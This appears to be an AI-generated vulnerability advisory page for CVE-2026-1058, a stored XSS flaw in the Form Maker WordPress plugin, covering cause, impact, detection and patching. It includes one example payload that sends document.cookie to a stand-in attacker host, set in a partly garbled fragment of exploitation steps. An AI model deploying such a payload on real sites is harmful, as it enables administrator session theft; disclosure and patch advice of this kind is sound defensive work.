
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1058 is a Stored Cross-Site Scripting (XSS) vulnerability in the Form Maker by 10Web plugin for WordPress, affecting all versions up to and including 1.15.35. The flaw allows unauthenticated attackers to inject malicious JavaScript into the admin submissions view by submitting crafted hidden field values in forms. It was published on February 3, 2026, with the assigner credited as Wordfence. The vulnerability carries a CVSS v3.1 base score of 7.1 (High) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). The plugin applies html_entity_decode() to user-supplied hidden field values when rendering them in the admin submissions list (Submissions_fm.php, line ~759), but fails to apply any subsequent output escaping. This means an attacker can submit an HTML-entity-encoded XSS payload via a public-facing form; when the plugin decodes it for display, the payload becomes executable JavaScript rendered in the administrator's browser. No authentication or special privileges are required to submit the malicious form data (Wordfence, WordPress Trac).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of an authenticated administrator's browser session when they view the submissions list. This can lead to session token theft, unauthorized administrative actions (such as creating rogue admin accounts, installing malicious plugins, or modifying site content), and potential full site compromise. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the plugin itself to the broader WordPress installation and its data (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported as of the available data. The EPSS score is approximately 0.085%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. However, the attack requires no authentication and only passive administrator interaction (viewing the submissions list), making it relatively straightforward to weaponize once a target site is identified (Wordfence, Red Hat CVE).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) and HTML-entity-encode it (e.g., <script>...</script>) to bypass any front-end validation.curl or Burp Suite.wp_formmaker_submits or similar) containing HTML-entity-encoded script tags or JavaScript event handlers in hidden field columns.Users should update the Form Maker by 10Web plugin to version 1.15.36 or later, which addresses the insufficient output escaping by applying proper sanitization after html_entity_decode(). The patch is available via the WordPress plugin repository (WordPress Trac Changeset). As a temporary workaround, administrators can restrict access to the submissions list to trusted IP addresses via server-level controls, or temporarily disable the plugin until the update is applied. Enabling a Web Application Firewall (WAF) with XSS filtering rules can also help mitigate exploitation attempts.
Wordfence, which discovered and disclosed the vulnerability, published it in their weekly WordPress vulnerability report for the period of February 2–8, 2026, highlighting it as a notable unauthenticated stored XSS issue (Wordfence Blog). The vulnerability was also tracked by security aggregators including Vulners, VulDB, and CIRCL, indicating standard community awareness. No significant broader media coverage or notable researcher commentary beyond the initial Wordfence disclosure has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."